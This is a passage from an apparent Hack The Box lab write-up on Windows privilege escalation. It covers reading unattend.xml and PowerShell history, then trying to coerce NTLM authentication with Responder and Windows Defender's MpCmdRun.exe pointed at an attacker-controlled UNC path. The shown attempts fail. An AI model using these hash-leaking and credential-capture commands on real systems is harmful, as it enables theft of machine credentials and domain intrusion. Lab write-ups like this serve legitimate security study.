none of the exe versions of winPEAS worked on this machine, so I had to run the .bat. I was also denied running systeminfo
The .bat version seemed to be stuck on a loop, so I started poking around manually while I waited, in another shell
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Desktop> type C:\Windows\Panther\unattend.xml
<?xml version='1.0' encoding='utf-8'?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<settings pass="generalize" wasPassProcessed="true">
<component name="Microsoft-Windows-PnpSysprep" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<PersistAllDeviceInstalls>true</PersistAllDeviceInstalls>
</component>
</settings>
<settings pass="oobeSystem" wasPassProcessed="true">
<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<OOBE>
<SkipMachineOOBE>true</SkipMachineOOBE>
<HideEULAPage>true</HideEULAPage>
<SkipUserOOBE>true</SkipUserOOBE>
<ProtectYourPC>1</ProtectYourPC>
</OOBE>
<TimeZone>GMT Standard Time</TimeZone>
<AutoLogon>
<Enabled>true</Enabled>
<Username>Administrator</Username>
<LogonCount>1</LogonCount>
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Domain>apt</Domain>
</AutoLogon>
<UserAccounts>
<AdministratorPassword>*SENSITIVE*DATA*DELETED*</AdministratorPassword>
</UserAccounts>
<FirstLogonCommands>
<SynchronousCommand wcm:action="add">
<CommandLine>net user dsc Password123! /add</CommandLine>
<Order>1</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>net localgroup administrators dsc /add</CommandLine>
<Order>2</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>winrm quickconfig -force</CommandLine>
<Order>3</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>powershell -Command 'Enable-PSRemoting -Force'</CommandLine>
<Order>4</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>powershell -File C:\lcm.ps1</CommandLine>
<Order>5</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>powershell -enc KABHAGUAdAAtAE4AZQB0AEEAZABhAHAAdABlAHIAIAB8ACAARABpAHMAYQBiAGwAZQAtAE4AZQB0AEEAZABhAHAAdABlAHIAQgBpAG4AZABpAG4AZwAgAC0AQwBvAG0AcABvAG4AZQBuAHQASQBEACAAbQBzAF8AdABjAHAAaQBwADYAIAAtAGMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQApAA==</CommandLine>
<Order>6</Order>
</SynchronousCommand>
</FirstLogonCommands>
</component>
</settings>
<settings pass="specialize" wasPassProcessed="true">
<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<RegisteredOwner>Administrator</RegisteredOwner>
<RegisteredOrganization>Managed by Terraform</RegisteredOrganization>
<ComputerName>apt</ComputerName>
</component>
<component name="Microsoft-Windows-TCPIP" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<Interfaces>
<Interface wcm:action="add">
<Ipv4Settings>
<DhcpEnabled>false</DhcpEnabled>
</Ipv4Settings>
<UnicastIpAddresses>
<IpAddress wcm:action="add" wcm:keyValue="1">10.10.10.86/24</IpAddress>
</UnicastIpAddresses>
<Ipv6Settings>
<DhcpEnabled>true</DhcpEnabled>
</Ipv6Settings>
<Identifier>00-50-56-b4-b2-37</Identifier>
<Routes>
<Route wcm:action="add">
<Identifier>1</Identifier>
<Prefix>0.0.0.0/0</Prefix>
<NextHopAddress>10.10.10.2</NextHopAddress>
</Route>
</Routes>
</Interface>
</Interfaces>
</component>
<component name="Microsoft-Windows-DNS-Client" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<Interfaces>
<Interface wcm:action="add">
<Identifier>00-50-56-b4-b2-37</Identifier>
<DNSServerSearchOrder>
<IpAddress wcm:action="add" wcm:keyValue="1">127.0.0.1</IpAddress>
</DNSServerSearchOrder>
</Interface>
</Interfaces>
</component>
<component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<RunSynchronous>
<RunSynchronousCommand wcm:action="add">
<Path>C:\sysprep\guestcustutil.exe restoreMountedDevices</Path>
<Order>1</Order>
</RunSynchronousCommand>
<RunSynchronousCommand wcm:action="add">
<Path>C:\sysprep\guestcustutil.exe flagComplete</Path>
<Order>2</Order>
</RunSynchronousCommand>
<RunSynchronousCommand wcm:action="add">
<Path>C:\sysprep\guestcustutil.exe deleteContainingFolder</Path>
<Order>3</Order>
</RunSynchronousCommand>
</RunSynchronous>
</component>
</settings>
</unattend>
The output had mentioned a few interesting files. The first I checked was C:\Windows\Panther\unattend.xml. These unattend files can often hold plaintext credentials. This administrator had been smart enough to remove his credentials afterwards.
(Get-NetAdapter | Disable-NetAdapterBinding -ComponentID ms_tcpip6 -confirm:$false)
The base64 encoded command drew my attention. It looked as if this was used to disable ipv6?
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Desktop> type C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
The powershell history file contained something interesting. The administrator credentials had been used to run a scriptblock that set the value of a registry key
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Desktop> echo $Cred
Nope. didnt work. darn lol
Some reasearch revealed that
The Network security: LAN Manager authentication level setting determines which challenge/response authentication protocol is used for network logons. This choice affects the authentication protocol level that clients use, the session security level that the computers negotiate, and the authentication level that servers accept.
Send NTLM response only | Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication. | 2
A value of '2' meant that NTLM hashes would be sent
according to https://book.hacktricks.xyz/windows/ntlm I could abuse the print spooler service to get the machine to send the hash to my machine, where I could capture it with responder
┌──(zweilos㉿kali)-[~/htb/apt]
└─$ sudo responder -I tun0 --lm
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.2.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[!] The challenge must be exactly 16 chars long.
Example: 1122334455667788
The instructions on this page are not as well written as a lot of others on this page, but at least responder gave a verbose enough error message to fix the problem
The github account was a good list of different ways to leak NTLM hashes I tried each one until I got one that wasn't henry
Windows Defender MpCmdRun
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" -Scan -ScanType 3 -File \\Server.domain\file.txt "c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -path \\Server.domain\
-Scan [-ScanType [0\|1\|2\|3]] [-File <path> [-DisableRemediation] [-BootSectorScan] [-CpuThrottling]] [-Timeout <days>] [-Cancel]
Scans for malicious software. Values for ScanType are: 0 Default, according to your configuration, -1 Quick scan, -2 Full scan, -3 File and directory custom scan.
remote share scanning? :)
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents\test> cd "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\"
Cannot find path 'C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\' because it does not exist.
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\henry.vinson_adm\Documents\test> cd "C:\ProgramData\Microsoft\Windows Defender\platform\"
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\ProgramData\Microsoft\Windows Defender\platform> ls
Directory: C:\ProgramData\Microsoft\Windows Defender\platform
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2020 11:09 AM 4.18.2010.7-0
d----- 3/17/2021 3:13 PM 4.18.2102.4-0
The example on the page did not work, but I found two newer versions in the /platform folder. I hoped that one would still be vulnerable to this issue
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0> ./MpCmdRun.exe -Scan -ScanType 3 -file \\10.10.14.187\test
Scan starting...
CmdTool: Failed with hr = 0x80508023. Check C:\Users\HENRY~2.VIN\AppData\Local\Temp\MpCmdRun.log for more information
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0> type C:\Users\HENRY~2.VIN\AppData\Local\Temp\MpCmdRun.log
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.14.187:8081\file.txt
Start Time: Thu Apr 01 2021 22:25:24
MpEnsureProcessMitigationPolicy: hr = 0x0
Starting RunCommandScan.
INFO: ScheduleJob is not set. Skipping signature update.
Scanning path as file: \\10.10.14.187:8081\file.txt.
Start: MpScan(MP_FEATURE_SUPPORTED, dwOptions=16385, path \\10.10.14.187:8081\file.txt, DisableRemediation = 0, BootSectorScan = 0, Timeout in days = 1)
MpScan() started
Warning: MpScan() encounter errror. hr = 0x80508023
MpScan() was completed
ERROR: MpScan(dwOptions=16385) Completion Failed 80508023
MpCmdRun.exe: hr = 0x80508023.
MpCmdRun: End Time: Thu Apr 01 2021 22:25:24
-------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe" -h
Start Time: Thu Apr 01 2021 22:28:13
MpEnsureProcessMitigationPolicy: hr = 0x0
MpCmdRun: End Time: Thu Apr 01 2021 22:28:13
-------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe" -Scan -ScanType 3 -Path \\10.10.14.187\
Start Time: Thu Apr 01 2021 22:28:56
MpEnsureProcessMitigationPolicy: hr = 0x0
Starting RunCommandScan.
MpCmdRun.exe: hr = 0x80070667.
MpCmdRun: End Time: Thu Apr 01 2021 22:28:56
-------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe" -Scan -ScanType 3 -file \\10.10.14.187\test
Start Time: Thu Apr 01 2021 22:29:07
MpEnsureProcessMitigationPolicy: hr = 0x0
Starting RunCommandScan.
INFO: ScheduleJob is not set. Skipping signature update.
Scanning path as file: \\10.10.14.187\test.
Start: MpScan(MP_FEATURE_SUPPORTED, dwOptions=16385, path \\10.10.14.187\test, DisableRemediation = 0, BootSectorScan = 0, Timeout in days = 1)
MpScan() started
Warning: MpScan() encounter errror. hr = 0x80508023
MpScan() was completed
ERROR: MpScan(dwOptions=16385) Completion Failed 80508023
MpCmdRun.exe: hr = 0x80508023.
MpCmdRun: End Time: Thu Apr 01 2021 22:29:11
-------------------------------------------------------------------------------------
The scan failed